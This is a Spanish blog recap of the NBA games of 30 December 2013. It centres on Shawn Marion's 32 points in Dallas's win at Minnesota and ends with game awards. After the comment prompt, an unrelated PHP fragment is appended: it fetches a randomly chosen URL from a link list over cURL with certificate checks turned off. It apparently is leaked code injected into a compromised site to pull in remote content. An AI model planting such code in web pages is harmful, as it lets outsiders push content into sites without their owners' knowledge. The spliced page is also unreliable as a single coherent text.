La Crónica: Súper Shawn Marion

31 de December de 2013 por Simon

Penúltima jornada del año 2013 que venía con 7 partidos bajo el brazo algunos de ellos muy interesantes con rivales directos enfrentándose a cara de perro. En la NBA ganar como visitante es una tarea complicada pero anoche no, anoche fue la fiesta del visitante con cinco de los siete partidos con victoria visitante. De haber sido la última jornada del año hubiera resultado un gran colofón porque tuvimos canastas sobre la bocina, partidos apretados y remontadas increíbles, pero por encima de todos ayer destacó una figura, Shawn Marion.

El que tendría que haber sido el partido más interesante de la jornada terminó siendo el partido más insulso de todos y es que pocos podían pensar que Phoenix iba a tener el partido sentenciado al descanso en su visita al Staples Center para enfrentarse a los Clippers.  Los Suns liderados por Goran Dragic y Gerald Green no dieron ninguna opción e impusieron su juego rápido y de contraataque que desarboló a los Clippers en su peor partido de lo que va de temporada (107-88). Seguro que el nuevo año empieza con mejor pie para ellos. El otro gran partido de la jornada en el Oeste era la visita de Dallas Mavericks a Minneapolis que terminó con victoria visitante que permite a los Mavs sacarse la espina de las dos derrotas que ya han sufrido ante los Wolves en esta misma temporada. Ahora mismo Dallas se encuentra octavo en su conferencia mientras que Minnesota son novenos por lo que la serie de duelos individuales puede ser vital a final de temporada. El partido fue un encuentro de idas y venidas. Un gran primer tiempo de los Mavs liderados por el mejor Shawn Marion en muchos años parecía que dejaba el partido sentenciado en la primera parte pero un espectacular tercer cuarto de los locales devolvió la emoción y la incertidumbre al encuentro. En el cuarto definitivo el intercambio de golpes y las alternancias en el marcador fueron una constante pero como ya hemos comentado anoche Marion estaba tocado por los dioses y con dos triples seguidos consiguió una renta de 5 puntos para Dallas que terminó siendo definitiva. Kevin Love tuvo una última jugada para adelantar a su equipo pero quién si no, Shawn Marion, desbarató el intento (no sin polémica) y certificó la victoria (100-98). 

Otro duelo interesante ayer era el Washington Wizards – Detroit Pistons. Aunque sin grandes diferencias, Detroit estuvo prácticamente todo el partido mandando en el marcador pero en el último cuarto el miedo que les da vencer en casa este año y que ni el mismo Billups puede explicar volvió a aparecer y los Wizards remontaron los casi 10 puntos que tenían de desventaja (106-99). Con esta victoria los Wizards se convierten en el cuarto equipo con al menos el 50% de victorias en la conferencia este. Con la derrota de Detroit, los Bulls tenían la oportunidad de recortar distancias en la lucha por los Play Off en el Este y la aprovecharon ganando a los Grizzlies. Años atrás este partido suponía un duelo entre las dos mejores defensas de la liga con equipos súper competitivos pero este año, por culpa en gran parte de las lesiones, ambos equipos están luchando muy lejos de los puestos en los que esperaban encontrarse a estas alturas de temporada. Con un gran Jimmy Butler que esta vez estuvo intratable también en ataque con 26 puntos los Bulls se llevaron el gato al agua y consiguieron su primera victoria de la temporada como visitante ante un equipo del Oeste (95-91).

En el resto de duelos de la jornada, Lebron James volvió a la acción y lo hizo con victoria en el pabellón de Denver Nuggets en un partido igualado que terminó resolviendo un triple de Michael Beasley (97-94). Los Blazers sufrieron su segunda derrota seguida sobre la bocina. Si hace apenas dos días fue Chris Bosh, anoche fue Tyreke Evans que parece haber vuelto a su mejor nivel desde el banquillo de los Pelicans (108-110). Finalmente, los Jazz continuaron su buena racha ante los Charlotte Bobcats y vencieron (80-83) con Trey Burke a buen nivel y Derrick Favors secando a Al Jefferson.

PREMIOS

MVP: Partidazo mayúsculo de Jrue Holiday. El jugador de los Pelicans anotó 31 puntos, repartió 13 asistencias y cogió 7 rebotes. Su compañero Anthony Davis se fue a los 27 puntos, 12 rebotes y 5 tapones. Juntos forman una sociedad explosiva.

Rookie: Gran partido de Trey Burke que resultó decisivo en los últimos minutos del partido ante los Bobcats. Anotó 21 puntos y repartió 5 asistencias.

Sorpresa: Shawn Marion apareció prácticamente de la nada para anotar 32 puntos. 

Decepción: Blake Griffin y Chris Paul vivieron una de sus peores noches en casa ante los Suns. Anotaron 26 puntos entre ambos pero con un 9 de 29 en TC y perdieron 8 balones.

Esfuerzo en vano: Kevin Love lideró la que hubiera sido una gran remontada con 36 puntos, 11 rebotes y 4 asistencias. Lástima para él que su equipo no llegará a culminarla.

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>